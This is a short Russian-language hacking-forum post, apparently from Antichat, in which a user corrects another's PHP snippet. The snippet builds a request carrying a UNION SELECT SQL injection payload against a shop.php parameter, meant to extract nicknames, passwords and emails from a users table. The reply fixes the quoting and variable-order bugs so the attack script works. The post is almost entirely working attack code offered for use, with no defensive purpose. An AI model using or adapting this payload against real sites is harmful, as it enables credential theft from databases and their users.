|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
PHP код:
$url = 'http://www.site.com/shop.php?st=2&movie=$request&id=676';
$limit = 0;
$ref = 'http://www.site.com/shop.php';
$request = '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25 from Portal.users limit+0,1/*';
Ну и на что ты надеешся? Одинарные скобки, переменная, которая объявлена позже ее вызова ..
PHP код:
$request = '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from Portal.users limit+0,1/*';
$url = 'http://www.site.com/shop.php?st=2&movie='.$request.'&id=676';
$limit = 0;
$ref = 'http://www.site.com/shop.php';
|